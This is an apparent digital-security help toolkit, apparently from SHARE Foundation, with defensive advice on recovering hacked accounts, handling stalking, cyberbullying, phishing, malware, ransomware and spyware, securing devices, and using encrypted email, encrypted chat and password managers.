Search

Search term(s): G

My account was hacked

If your social media account is hacked and you lose access to it, here are some steps you can take to regain control and secure your account:

Check for unauthorized activity and review connected apps, devices, and permissions - If you suspect your account has been hacked but can still access it from another device, check in the Security and Privacy settings of your account for any unauthorized activity such as posts, messages, or changes to your profile information. Also, check if your account is logged in on an unknown device and remove any devices you don’t recognize. This can help you assess the extent of the breach and any damage done.

Check in the Security and Privacy settings of your account for any third-party apps or services that have access to your social media account and revoke access to any suspicious or unfamiliar ones. This helps prevent future unauthorized access through connected apps.

Facebook - If there is an issue with your Facebook page, please log into Facebook and use Facebook's form to recover the page. If you cannot log into your Facebook account, please go through the Facebook account recovery workflow.

X - If you believe your X account is compromised, try following the steps in Help with my compromised account. If your account is not compromised, or you have other account access issues, you can follow the steps in Reactivate my account.

Google - Please try following the instructions in How to recover your Google Account or Gmail.

Yahoo - Please follow the instructions in Fix problems signing into your Yahoo account to recover your account.

Instagram - Please try following the instructions in If you think your Instagram account has been hacked to recover your account.

TikTok - Please try following the instructions in My account has been hacked to recover your account.

Proton - Please follow the instructions for resetting your password to recover your account. Please note that if you reset your password, you won’t be able to access your existing emails and contacts, since those are encrypted with a key that is protected with the password. Old data can be recovered if you have access to a recovery file or recovery phrase by following the steps in Recover Encrypted Messages and Files.

Contact platform support - Reach out to the support team of the social media platform through their designated channels (usually available on their website under “Help” or “Support”). Report the hacking incident and request assistance in recovering your account. Provide any relevant details or evidence that can help verify your identity as the rightful account owner.

Ask for further help - If the procedures suggested here haven't helped you recover access to your account, and if you are a journalist, activist, or a human rights defender, you can reach out to the following organizations to ask for further help:

Secure other accounts and enable multi-factor authentication (MFA) - If you use the same password for multiple accounts, immediately change the passwords for those accounts to prevent further unauthorized access. It's crucial to use unique, strong passwords for each of your accounts to enhance security.

Once you regain access to your account, enable multi-factor authentication if the platform offers this feature. MFA adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone, in addition to your password.

Please refer to this guide for details on how to set up MFA on multiple platforms. 2FA Directory has more information on which tools support MFA and provides links to helpful guides.

I forgot my password / username

In case you cannot remember or find the credentials you use to login to an account, here is some advice you can try out:

Recovery account - Most platforms and online service providers offer an option to set up a recovery or backup contact, usually an email address, a phone number, or a set of one-time backup codes. It is very important to set up this option so you don’t get locked out of your account. Regularly check that you still have access to your sign-up account and protect your recovery contacts just as you protect your main account, especially if you belong to an at-risk group.

In case you can’t access your account and you are not logged in on any other device, use your backup email address or phone to gain access to the original account. Make sure you have access to your backup communication method/account - otherwise, you might never be able to access the lost account - and check this regularly. It is important to secure the backup account as well, because it could grant someone full access to the main account.

Google provides an option to set up a recovery email account and phone number within the Personal info section of your Google Account. For Yahoo, you can use the Account Security page to add a recovery method, i.e. a phone number or an email address. Outlook, Hotmail, and other Microsoft accounts can also add a recovery email in the account security section.

Check the browser for saved passwords - Modern browsers (Firefox, Chrome, Edge) have the option to save your passwords, so you don’t have to enter them every time you log in. However, it is more secure to use a separate password management software such as KeePass, KeePassXC, or Bitwarden.

In cases where you cannot log in by typing your password, you should check if your browser saved a password at some point and use it to access your account. It is always advisable to copy and paste the password instead of typing it to avoid errors (though some websites don’t allow this). You can check for saved passwords in the options/preferences section within popular internet browsers: Firefox, Brave, Chrome, and Edge.

Password reset - In case you have trouble accessing your account and you have checked that you are entering the right password (mind the CAPS LOCK and keyboard language), you can try resetting your account password. On most platforms and online services this can be done by clicking on the link named “Forgot your password?” or something similar, which is located on the login page.

Follow the instructions on the “Forgot your password” page and make sure that you have access to the email address/phone number you used to create your account. If you don’t have access to this email or phone, you will need to use the recovery (backup) account if the provider supports that option. Otherwise, you might be left locked out of the account.

Most likely, the service provider will send you a password reset link or code via email or other means of communication, which will enable you to create a new password for your account. From then on, you will use the newly created password to access your account.

Security Questions - Another method to regain access to your account is to provide answers to the security questions, in case you enabled that option in your account security settings. However, some providers are removing this option due to the inefficiency of security questions (they can easily be guessed, etc.). Also, people often don’t change the answers to these questions for years or simply forget them because they don’t have a frequent need for them.

However, if you still have a security question as your account backup solution, make sure the answer is kept in a safe place, that it is not some publicly available information or something easy to guess (“What’s your favourite food?” for example).

Access a trusted device - Having 2-step authentication turned on for all of your accounts is an essential security practice. However, in case the verification method you set up (phone number, app) is not working or has changed, you should try accessing the account from a trusted device. Many service providers offer the option (usually just a checkbox on the 2-step page) to mark a device as trusted so you wouldn’t have to enter 2-step security codes each time you log in on that specific device, such as your home computer.

Make sure that only personal devices (computers, tablets, phones) you use regularly are marked as trusted and never use this feature on public or someone else’s devices.

Request a recovery of a deleted account - In case your account gets deleted, there is a possibility that you could request a recovery, as long as not much time has passed since it was deleted. In case you haven’t used your account for a long time, you probably won’t be able to restore it in full.

The process differs among various service providers. With Google, for instance, a user will be asked a series of questions to confirm it is indeed their account. Advice Google gives to users trying to restore their accounts is to answer as many questions as possible without skipping them entirely, use a familiar device and location, be exact with passwords and security questions, use an email connected to your account which you can access (e.g. a recovery email) and add helpful details if you're asked why you can't access your account.

My account is blocked

At times, accessing your online account may become impossible as it could be blocked or disabled by the platform due to breaches of the Terms of Service or Community Guidelines. This situation may arise if your account faces a surge of fraudulent user reports or if the platform’s automated security systems wrongly flag legitimate content as a violation.

Submit an appeal to the platform - If you encounter messages indicating that your account is locked, restricted, disabled, or suspended, and you believe this action is unwarranted, follow any appeal mechanism accompanying the message. Guidance on how to submit appeals can be found at the following links:

Inform yourself about the platform’s terms - Please make sure that you’ve read the platform’s rules and that you understand what kind of behaviour can cause account suspensions.

My website is down

Websites can stop working or being accessible for a multitude of reasons; therefore, it is important to consider the following steps to try to find the root cause and resolve the issue:

List of server errors - When a browser tries to access a website, it is served a status code: a three-digit number that indicates whether the request was successful. Status codes are usually invisible to the user, but when they indicate an error, they are often shown in the browser. This can be helpful in solving issues when your website isn’t working.

Such status codes could be client errors, which start with a 4 (such as 404, meaning the page isn’t found, or 403, meaning the user doesn’t have access to the page), or server errors, which start with a 5 (such as 502, meaning the server isn’t able to handle the request). When dealing with such errors, be sure to refresh the page in your browser after making changes on the server and check server logs for more details if the issue persists.

DigitalOcean has provided a list of common client and server-type errors, what causes them, and detailed explanations of how each one can be resolved.

Contact your hosting provider - In case you are unable to fix issues yourself or through your system administrator, e.g., by troubleshooting server errors, your next course of action would be to contact your hosting provider. However, depending on whether your server is located in your country or abroad, your experience with the hosting provider may differ.

Even though foreign hosting providers may provide a better service than those in your country, you should also be aware that their support might not be up to the standards in resolving the issue with your website quickly.

Hosting providers with 24/7 support are the best option nonetheless, as well as those who provide additional support channels (live chat, call) in addition to opening a support ticket or sending an email.

Media, civil society organizations, and at-risk groups (e.g., LGBT+) should consider hosting solutions offered by Greenhost, Qurium, or Deflect, as their services are adapted to the needs of public interest actors.

Activate DDoS protection - Distributed Denial of Service (DDoS) attacks aim to flood the server with a large number of automated access requests, usually coming from thousands of IP addresses, in order to make the site unavailable. To prevent your site from being disabled in a DDoS attack, you should activate DDoS protection.

The most common DDoS protection service provider is Cloudflare, which offers free plans but with limited options. There are others such as Deflect, whose services are used by many media, environmental, and human rights organizations. Google also offers free DDoS protection through Project Shield, which is intended for news, human rights, and election monitoring sites.

Independent media, investigative journalists, and human rights activists in repressive regimes can also apply for Qurium’s Rapid Response support, which includes DDoS protection among other things. Cloudflare provides their paid service tier free of charge through Project Galileo, for which at-risk public interest actors can apply.

Change your password - In case your website is down or has other unusual performance issues, the first thing you should try is changing your account password for the website in the content management system (CMS) interface, such as WordPress. Also, check for any suspicious activity like unknown plugins or themes, newly created users, or changes to existing users’ privileges.

When heavy cyber incidents occur, it is also advised to change the server password. This can be achieved in different ways depending on the type of the server (Windows Server or Linux).

Ask for server logs - To determine the potential source of issues with your website, taking a look at server logs can be of great importance. Server logs are text documents that provide you with various information about all activities on the server. For example, you can see the IP addresses and identity of the devices making a request to the server, the time and date of the request, etc., which can all be crucial when mitigating a cyber incident.

You can request server logs for a certain time frame from your system administrator or through technical support.

Request backup restore - When a cyber incident is resolved, a check needs to be performed in order to see if there is anything missing. Malicious actors might be able to delete some of the content from your website; therefore, it is important to have regular server and website backups.

In case you notice some content is missing after the incident has been handled, it is possible to restore it by requesting a backup from your hosting provider or technical support.

I am being stalked

If you suspect that someone is stalking you online by diligently and continually following you and attempting to contact you, here are some steps you can take to protect yourself:

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X, and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends, for example.

Block and report stalker’s accounts - Use the Block option to prevent a person from contacting you through an online service or engaging with the content you share. In addition, make sure to report the person to the platform for harassing you.

Turn off location services - If you suspect that someone is tracking your location, consider turning off location services on your devices. This prevents them from being able to track your whereabouts without your knowledge. Also, be mindful of unknown AirTags or similar tracking devices as they also present a security risk. For more information on Bluetooth trackers, refer to this guide by the Electronic Frontier Foundation.

Reduce your online footprint - Limit the visibility of your online content only to your circle of followers or friends. For example, you can limit who can view your Facebook posts and set them to friends only, or set an account to be private using the advice on limiting profile visibility. You can also ask people not to share photos of you online and refrain from tagging you in their posts.

Consider using an anonymous account - In case you need to use an online account for work purposes, create an anonymous account under a made-up name and don’t share it with anyone.

Seek support - If you feel unsafe or threatened, seek support from trusted friends, family members, or a counsellor.

Report to the police - In case you feel frightened for your physical safety, call the police without hesitation.

My partner is spying on me

If you suspect that your partner may be spying on you, whether it's through digital means or otherwise, it's important to take steps to protect your privacy and well-being. Here's some advice on what to do in such a situation:

Assess the situation - Take some time to reflect on your suspicions and gather any evidence that supports your concerns. It's essential to understand the extent of the spying and whether it's a violation of your privacy and trust.

Protect your devices - Take steps to secure your digital devices and accounts. This could include changing passwords regularly, setting up a lock method (PIN, pattern), enabling two-factor authentication, and ensuring that your devices are not easily accessible to your partner without your consent and knowledge.

Turn off location services - If you suspect your partner is tracking your location, consider turning off location services on your devices. This prevents them from being able to track your whereabouts without your knowledge.

Check for tracking devices - Be mindful of unknown AirTags or similar tracking devices as they also present a security risk. For more information on Bluetooth trackers, refer to this guide by the Electronic Frontier Foundation.

Be mindful of communication - Be cautious about what you share with your partner, especially if you suspect they may be monitoring your communications. Consider using secure messaging apps such as Signal or having sensitive conversations in person.

Seek support - If you feel unsafe or threatened by your partner's behavior, seek support from trusted friends, family members, or a counselor. You may also consider reaching out to a domestic abuse hotline or support organization for guidance and assistance.

My intimate content is being shared without consent

Non-consensual intimate image sharing is defined as posting sexually explicit content without consent, with the intent of humiliation, shame, or blackmail. It is a violation of privacy and can result in extreme emotional trauma. There are various similar forms of online privacy invasions, such as hyper-realistic software-manipulated video or audio content known as deepfake, which can be used to depict intimate images or sexual content with your likeness.

Another very problematic issue that can have serious consequences for privacy is so called doxing, i.e. publishing private information about a person such as their phone number (mobile, home landline, or work phone), home address, email address, copies of identification documents such as ID cards or passports, payment card numbers and so on.

SHARE Foundation and partner organisations developed Cyber Intimacy, a practical guide on how to act when someone shares your intimate content online without your knowledge and consent, with advice on how to collect the evidence, report the content to large online platforms, ask for support from organisations, file a criminal complaint, as well as templates for requesting the removal of the content in question.

Document the situation - Collect all the information (links, messages, etc.) about the intimate content in one place and make sure to update the list accordingly.

Save evidence - Download, use screenshots or screen recording to collect the evidence of your intimate content being posted online in order to submit it for a legal proceeding.

Report the content to the platforms - Make sure to report all the instances of content to the online platforms and keep track of their responses.

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends for example.

Block and report accounts - Use the Block option to prevent further abuse from accounts through an online service or engaging with the content you share. In addition, make sure to report the accounts posting your private content to the platform.

Remove any publicly visible personal data from your accounts - Review your online profiles and posts and make sure to remove any personal data you might have made public, such as your email address or phone number.

Consider using an anonymous account - In case you need to use an online account for work purposes, create an anonymous account under a made-up name and don’t share it with anyone.

Seek support - Reach out to the organisations which can provide legal assistance and support through the Cyber Intimacy platform.

Report to the police - In case the privacy invasion persists and you feel frightened for your physical safety, call the police without hesitation.

I am being cyberbullied

Cyberbullying can take many forms, ranging from threats of violence, hate speech, discrimination, trolling, false accusations to public humiliation, among others. It can sometimes spiral out of control and cause profound consequences. However, here are some steps you can take in case you are a target of cyberbullying:

Document everything - Save any harassing messages, emails, posts, or comments, as it can be useful when reporting the case to the authorities or online platforms.

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends for example.

Block and report - Use the Block option to prevent further abuse through an online service or engaging with the content you share. In addition, make sure to report the person to the platform for harassing you, along with any content that presents cyberbullying.

Don't engage - Avoid engaging with the cyberbully or responding to their messages, as engaging can sometimes fuel further harassment.

Consider using an anonymous account - In case you need to use an online account for work purposes, create an anonymous account under a made-up name and don’t share it with anyone.

Seek support - Talk to someone you trust about what you're experiencing, such as a friend, family member, teacher, or counsellor.

Report to the police - In case the cyberbullying persists and you feel frightened for your physical safety, call the police without hesitation.

Someone is impersonating me

Fake online profiles are easy to make, especially on social media platforms, which means practically anyone can impersonate you in just a few steps. Impersonation can cause a lot of distress and potentially put you in trouble for something you did not do, but here is some advice how to handle these situations:

Document everything - Save information (links to profiles, screenshots, usernames and display names, etc.) on accounts that are impersonating you or someone you know, as it can be useful when reporting the case to the authorities or online platforms.

Report fake profiles for impersonation - In case someone is impersonating you by making fake online accounts, you can use platform mechanisms to report them. Here you can find more instructions on how to report impersonation on different online services: Facebook, Instagram, TikTok, X and YouTube.

Limit your profile visibility - Check who can see your profile: some platforms offer the possibility to make your profile not visible publicly, meaning that you need to approve an account that wants to follow you. See further advice on how to set account privacy on Instagram, X and TikTok. On Facebook, you can set a default audience, so that all your future posts are only visible to your friends for example.

Notify your contacts - Also, a good strategy is to reach out to your friends, family and network of contacts to warn them of these manipulating accounts and ask them to also report these accounts.

Consider verifying your account - Online platforms offer users to verify their accounts through identity checks, so this is an option to consider, especially if you are a journalist or an otherwise publicly exposed person. For more details refer to these guides from Facebook, Instagram, X, TikTok and YouTube.

Seek support - Talk to someone you trust about what you're experiencing, such as a friend, family member, teacher, or counsellor.

I disclosed my login details

Links shared through text or chat messages or emails can take you to fake login pages that will steal your credentials, or other types of pages that might steal your personal or financial information. Sometimes, these malicious websites might ask you to download attachments that run malicious software on your device when opened. Important steps you can take:

Change passwords - In case you entered your login credentials, your accounts may be at risk! If you think your account is compromised, it is recommended that you try to change your password immediately and follow the instructions in the Hacked Account section of this toolkit.

Save the message - Make a screenshot of the message so that the sender’s contacts (email address, phone number, name), links and potential attachments are clearly visible.

Watch out for account security notifications - In case you receive a security notification regarding your account, such as new login attempts or changes to your contacts, do not approve them and secure your account.

Monitor changes on your bank account - Also, monitor your online banking account or look for notifications from the bank in case your funds are withdrawn, and immediately contact your bank’s customer service to prevent further abuses.

Notify your contacts - You should also inform your community about this malicious message and warn them of the fraud.

I downloaded a suspicious file

In case you downloaded some malicious files to your device from a scam email or message, your device may be at risk! The trick here is not to open that file because opening it will most likely run a malicious program that might be hidden in the file.

Run an antivirus scan on the downloaded file - You can scan the file with your antivirus program such as Bitdefender or Avira. It is also recommended that you run a full scan of your device with the antivirus software and remove any other malicious files from your device.

Look for any suspicious device activity - Try to notice anything problematic with your device, such as programs opening on their own, device becoming sluggish, battery drain or pop-up windows in your browser.

If you opened the file, run a full antivirus scan and change passwords - In case you have opened the suspicious attachment, scan your device with antivirus software and change the passwords for the accounts you are logged in from another secure device.

Notify your contacts - You should also inform your community about this malicious message and warn them of the fraud.

I disclosed my payment card information

You may find yourself in a situation where a malicious actor gains access to information on your credit or debit card, e.g. card holder name, card number, date of validity, etc. The scammers can get access to this data in multiple ways, for example through malicious websites designed to look as genuine card payment processing websites or by tricking the card holders to take photos of both sides of their payment card through social engineering. In case you reveal your payment card information, the following steps are of key importance:

Block your payment card - As a first step, you should immediately block your payment card either by contacting the bank directly or by using your bank’s online account or mobile application.

Do not provide bank security codes - For some online card payments the bank will send you, usually via SMS, a one-time confirmation code containing several digits. Do not provide this code to anyone, especially if they are pretending to be a bank employee.

Report the incident - If you willingly disclose your payment card information and experience a loss of funds, you have the option to report the incident to the authorities. However, if you lose money due to a security incident where your payment card information wasn't disclosed by you, contacting your bank increases the likelihood of recovering your funds. Steps on how to secure your funds may vary depending on the bank, so it is best to contact your bank’s customer service.

I received a suspicious message

In case you only received a message (email, SMS, chat app) that might be suspicious, consider the following:

Take a closer look at the message - State institutions, online shops, banks, or delivery services will never ask for your personal or financial information only through online communication. Also, if an offer seems too good to be true (free products or services, significant discounts for expensive products, prize money, etc.) it most likely is a scam.

Note the contents of the message itself - Is the message written logically and grammatically correct? Pay attention to details such as the design of the message and compare it to previous ones from the same sender.

Do not act upon the instructions - Any suspicious message should be marked as spam, deleted, and the sender blocked to prevent further contact.

Examples of phishing emails and text messages can be found in this guide. For additional information on how to analyse suspicious messages, visit the Email analysis section of this toolkit.

My device is lost / stolen

In the event of your device being lost or stolen, you should consider the following:

Change all passwords - If you believe that your device might be stolen, as a precautionary measure it is good to change all the passwords to your accounts that are logged in. It is also advisable to use a trusted device to logout from all sessions on the lost device.

Changing all of your passwords is much easier and safer with the help of specialised applications called password managers. These apps securely store your login credentials and protect them with a master password. That way, you only need to remember your master password and you can copy/paste your other credentials directly from the app. Password management software usually has the option to automatically generate a long and complex password, made of randomised characters and symbols. Applications commonly used for password management are KeePass, KeePassXC and Bitwarden.

Remote lock and erase - Android phones, in case they have the “Find My Device” option enabled, provide you with the possibility to remotely lock them with your PIN, pattern, or password or even erase all data on the phone. Google provides further instructions on how to secure seized Android devices. Similar options are provided by Apple for iOS devices such as iPhone or iPad.

Locate a device - In case you can’t find your device and suspect that it might be stolen, there are ways to determine its possible location. For example, smartphones based on Android and iPhones have the option to remotely locate your device. For further details and requirements (e.g. the device must be turned on, connected to the internet, etc.) on how to enable the remote find option visit Google’s instructions for Android devices or Apple’s guide in case the device is an iPhone or iPad.

Report the disappearance - If you did not manage to find your phone or you are confident it has been stolen, make sure to report it to the police. Try to remember where and when you last had your device with you and any other details that might be of help (were you alone or with someone, etc.).

My device is damaged

In case your device is broken or damaged, consider the following steps:

Factory reset - Your device may start acting strange and having various performance issues (working too slowly, showing too many errors, certain apps or features not working). In case you cannot resolve these issues by restarting the device and/or clearing the cache, running an antivirus or antimalware check, or updating your device software, drivers, or operating system, a factory reset might be a solution.

Be aware that If you run a factory reset on your phone all the data will be lost, so make sure to back up any important data before proceeding. See more information from Google on how to do a factory reset on Android devices or Apple’s support page on how to do the same on iOS-based devices.

Repair shop - If resetting your device to factory settings did not resolve the issues you experienced, it might be best to take the device to a repair shop. Before you do this, it is important to back up any data on your device and also make sure to protect your device, sensitive files, and apps with a password or a PIN.

Before choosing a specific repair shop, do a simple online search and try to find the ones with the best online reviews and positive comments.

Data recovery tools - In case your files are lost or you accidentally deleted them and you don’t have a backup, there are data recovery tools that can help you. Unless the data was deleted with an advanced tool such as Eraser, conventional data recovery tools might help you restore files.

Recuva is a data recovery software for Windows which has both free and paid versions. For an average user, the free option should be enough to recover deleted files and it also works with memory cards, external hard drives, and USB sticks. Disk Drill, another recovery tool with a free plan, also works for MacOS in addition to Windows.

My device was seized

If you are attending a protest or other high-risk event, your devices such as mobile phones might be seized by the police or private security. In case this happens, your private data becomes exposed to all kinds of risks. In regards to this consider the following:

Check your device - In case your device was taken from you, once you get it back make sure to check for any suspicious changes, e.g. if there are unknown apps installed or changes to settings. On Android phones, you can check whether Play Protect is turned off, as it offers protection against potentially malicious apps. In case it was turned off, make sure to turn it back on.

I got an antivirus warning

Discovering that your device is infected with malware can be concerning, but there are steps you can take to address the issue and minimise the damage:

Isolate the device - Disconnect your infected device from any network connections, including Wi-Fi and wired connections, to prevent the malware from spreading to other devices on your network.

Run antivirus software - Use antivirus or antimalware software such as Bitdefender or Avira to scan your device for malware. Make sure your antivirus definitions are up-to-date before running the scan. Allow the software to remove or quarantine any detected malware.

Update software and operating system - Ensure that your operating system, web browsers, and other software are up-to-date with the latest security patches and updates. Malware often exploits vulnerabilities in outdated software to infect devices.

Change passwords - If you suspect that sensitive information such as passwords may have been compromised, change those passwords immediately. Choose strong, unique passwords for each account to enhance security.

Backup important data - If you haven't already done so, backup any important files or data on your device to an external storage device or cloud service. This can help prevent data loss in case the malware causes damage to your files.

Consider asking for help - If you're unable to remove the malware on your own or if the infection is severe, consider seeking help from a professional computer technician.

My data is ransomed / locked

One of the biggest security problems and forms of cybercrime today is ransomware. This type of malware encrypts files so that they cannot be accessed without a decryption key. The attackers then ask for payments in cryptocurrency to provide targets with the decryption key, usually within a short time frame to put more pressure on the targets.

Check for available decryption tools - In case you are a target of ransomware, the general advice is not to pay, as there is no guarantee you will indeed receive the correct decryption key. Payments also encourage further cybercrime attempts. You can try to find a decryption tool based on the type of ransomware. For example, No More Ransom is an initiative that provides citizens with free decryption tools for many forms of ransomware. Most ransomware targets are large companies, but individuals should be aware of the dangers and consequences too.

Restore backup - Depending on which data you cannot access, you should try to restore your files from a backup. Make sure your files are backed up regularly and that you can access the backups in case they are kept on some cloud-based service (e.g. Proton Drive, Dropbox, Tresorit).

Restore system - In case the operating system of your device suffered serious damage affecting its performance, it is advisable to restore it to the last configuration when it was fully functional. Windows has the System Restore option, and MacOS can use the Time Machine, while for Linux systems there are many available restore backup tools.

I may be targeted with spyware

Journalists, activists, human rights defenders, and opposition politicians have found their mobile phones targeted by advanced spyware tools such as Pegasus or Predator. These tools are highly intrusive as they practically provide full access to the device and are difficult to discover without applying digital forensics techniques on the phone.

Look out for threat notifications - Apple sends threat notifications, i.e. messages notifying the user that their device might be targeted with mercenary spyware attacks. In case you receive such a message, the advice is to take it seriously and contact organisations such as SHARE Foundation, Amnesty International, Access Now, or Citizen Lab.

Google does not send threat notifications for Android devices as Apple does for their products. However, Google might similarly notify you in case there is suspicion that your account has been targeted by government-backed attackers.

Turn on Lockdown Mode on Apple devices - To stop advanced threats, such as Pegasus or Predator spyware, from compromising your Apple devices, enable Lockdown Mode. This disables certain features on your device (iPhone, iPad, Mac) and it somewhat affects the user experience, but is known to stop sophisticated cyberattacks.

Update your phone - Make sure that all the apps on your phone are regularly updated and that you also have the latest version of iOS or Android. Operating system updates also contain security patches, which are critical for preventing spyware from infecting your device.

Be cautious of suspicious messages or calls - These spyware tools are usually delivered through messages or calls from unknown foreign numbers, so try to remember if you received a very suspicious message at some point.

My chats / calls might be intercepted

In case you suspect someone is intercepting your calls or messages, there are steps you can take to make sure that your conversations or chats are not compromised:

Use encrypted calls and chats - End-to-end encryption (E2EE) keeps messages and calls encrypted and private from everyone, including the provider of the messaging service. The sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. It's like when you send a scrambled letter through a postal service, nobody can read your letter except you and the person to whom you sent it.

One of the benefits of E2EE chat apps is that you can easily connect to your contacts without additional steps like public key exchange for PGP emails. The following apps offer end-to-end encrypted chats by default:

Signal is a free and open-source application developed by an independent non-profit organisation, which means it does not contain ads or trackers within the app. Some of the useful features of the app are disappearing messages, it is available for both mobile and desktop, and supports proxy access (if Signal is blocked in a country).

Element is a free and open-source chat solution, built on Matrix, an open network for secure, decentralised communication. Some of the perks of Element are that it can be self-hosted, it's good for organisational implementation because it is easily scalable, and there are free and paid versions.

WhatsApp is free to use but a proprietary app, which is available on mobile, desktop, and web alike. WhatsApp is owned by Meta, Facebook’s parent company, which doesn't provide a sense of privacy because its business model is based on selling user data. It has some useful features like disappearing messages.

My email might be intercepted

In case you suspect someone is intercepting your email correspondence, there are steps you can take to make sure that your emails are not compromised:

Use PGP to encrypt emails - Emails can be encrypted using PGP (Pretty Good Privacy), which is based on public key cryptography. You need to generate a key pair - a public key that you share with others and a private key that you keep secret - to exchange encrypted emails with correspondents.

If you use an email provider like Gmail or Outlook, you can encrypt your communication using Thunderbird, an open-source email client with built-in OpenPGP capabilities, or by using the Mailvelope browser extension which works with popular webmail services. By using these tools you can easily generate a key pair for encrypting your email, or import existing encryption keys.

Switch to encrypted by default email providers - There are email providers, such as ProtonMail or Tuta, which encrypt messages automatically when they are sent between their users and also provide ways to send encrypted emails to those using other providers. Please refer to these Proton and Tuta guides on how to send password protected emails to users on other email providers.

Change your email account password and turn on multi-factor authentication - If you suspect that someone has accessed your email account and has been reading your correspondence, change your password immediately and set up multi-factor authentication (MFA). MFA adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone, in addition to your password. Please refer to this guide for details on how to set up MFA on multiple email providers. 2FA Directory has more information on which tools support MFA and links to guides.

Email encryption

Similar to hard drives and removable disks, communication channels can also be encrypted by protecting data with a complex cipher so that communication can only be accessed (decrypted) with a password or key. Of course, for journalists and human rights activists encryption is a key component of ensuring secure communication with confidential sources. This can be done in a variety of ways.

In messaging services, we know that third parties store the data, such as messages and calls, and that the data is only encrypted in transit, which can be a problem if privacy is needed at all points of communication. End-to-end encryption (E2EE) keeps messages encrypted and private from everyone, including the provider of the messaging service. The sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. Basically, it's like when you send a scrambled letter through a postal service, nobody can read your letter except you and the person to whom you sent it.

Emails can be encrypted using PGP (Pretty Good Privacy), which is based on public key cryptography. You need to generate a key pair - a public key that you share with others and a private key that you keep secret - in order to exchange encrypted emails with correspondents.

However, there are email providers, such as ProtonMail or Tuta, which encrypt your messages automatically when they are sent between their users and also provide ways to send encrypted emails to those using other providers. Please refer to these Proton and Tuta guides on how to send password protected emails to users on other email providers.

Chat encryption

In messaging services, we know that the third parties store the data, such as messages and calls, and that the data is only encrypted in transit, which can be a problem if privacy is needed at all points of communication. End-to-end encryption (E2EE) keeps messages encrypted and private from everyone, including the provider of the messaging service. The sender is one “end” of the conversation and the recipient is the other “end”, which leads to the name “end-to-end”. Basically, it's like when you send a scrambled letter through a postal service, nobody can read your letter except you and the person to whom you sent it.

One of the benefits of E2EE chat is that you can easily connect to your contacts without additional steps like public key exchange for PGP emails. The following apps offer end-to-end encrypted chats by default:

Making a strong password

When making a password, you should make sure that it is unique, i.e. that it is only used for one account or device, long and complex.

Using the same password for multiple resources is a risk - if one of your accounts is compromised, others using the same password might be as well.

Having a long password - 10+ or even 20+ characters, the longer the better - makes it harder to crack or guess. The use of different types of characters and symbols, such as numbers, small and capital letters, and special characters (!, ~, *) is strongly encouraged.

Avoid using online password generators and “how strong is my password” tools - you can’t know who is behind them and where your passwords might end up.

It is also highly recommended to set up multi-factor authentication on your accounts if the online service or platform has that option. This creates an additional layer of protection, as an additional step is required to log in, usually a one-time code received via SMS or an app such as Aegis Authenticator. iPhones have a built-in option to generate MFA codes.

However, multi-factor authentication (MFA) is not a perfect solution - people are still susceptible to social engineering attacks, such as phishing scams, and can be persuaded or fatigued to disclose the second authentication factor, a one-time code for example. This is why it is important to consider a phishing-resistant solution for MFA, such as the use of physical hardware keys.

Multi-factor authentication by default is unfortunately still not an industry standard - there are services that don’t offer it, and for those that do, users still have to navigate through complex security settings in their accounts in order to set it up.

Although any kind of MFA is better than having none, some forms are safer than others. For example, receiving codes via SMS is less secure due to security flaws in mobile networks and so-called “SIM swapping”, i.e. when an attacker gains access to a person’s phone number by tricking their mobile provider’s staff.

However, it should be noted that MFA is not a substitute for regular security training and awareness of threats such as ransomware. It is very important to build a positive, proactive security culture within your organisation with motivating and engaging training - you can improve digital security on both personal and organisational levels if you focus on all three domains of cybersecurity: people, processes, and technology.

Password management

With so many accounts an average internet user has today, it has become impossible to memorise all passwords and have them be unique, long, and complex at the same time.

That is why you should use applications called password managers, which securely store your login credentials and protect them with a master password. That way, you only need to remember your master password and you can copy/paste your other credentials directly from the app. Password management software usually has the option to automatically generate a long and complex password, made of randomised characters and symbols.

Applications commonly used for password management are KeePass, KeePassXC, and Bitwarden. KeePass provides a tutorial for the first steps after you install the application and KeePassXC also offers a detailed instruction page for new users. When it comes to Bitwarden, before you start using it you need to register for an account and log in to the app type of your choice, e.g. browser add-on, desktop app, or mobile app.

Storing login credentials in browsers should be avoided, together with online password managers which are not open source and end-to-end encrypted.

Email encryption

Encryption is a process of converting information or data into a code to prevent unauthorised access. It involves the use of algorithms (mathematical procedures or formulas) to transform plaintext, which is the original and readable data, into ciphertext, which is the encrypted and unreadable form. The encryption process typically requires a key, which is a specific piece of information used in conjunction with the algorithm to perform the encryption and, later, the decryption.

The primary purpose of encryption is to ensure the confidentiality and security of sensitive information during storage or transmission. Encryption is widely used in various applications, including secure communication over the internet, safeguarding personal information, protecting financial transactions, and securing sensitive data on storage devices. There are different types of encryption algorithms, and the strength of encryption often depends on factors such as the length of the encryption key and the complexity of the algorithm used.

Symmetric encryption involves the use of one key for both encryption and decryption. The plaintext is fed into an encryption algorithm along with a key. The algorithm uses the key to turn the plaintext into ciphertext, thus encrypting the original sensitive data. This works well for data that is being stored and needs to be decrypted at a later date. The use of just one key for both encryption and decryption reveals an issue, as the compromise of the key would lead to a compromise of any data the key has encrypted. This also does not work for data-in-motion, which is where asymmetric encryption comes in.

Asymmetric encryption works with a pair of keys. The beginning of asymmetric encryption involves the creation of a pair of keys, one of which is a public key, and the other is a private key. The public key is accessible by anyone, while the private key must be kept a secret from everyone but the creator of the key. This is because encryption occurs with the public key, while decryption occurs with the private key. The recipient of the sensitive data will provide the sender with their public key, which will be used to encrypt the data. This ensures that only the recipient can decrypt the data, with their private key.

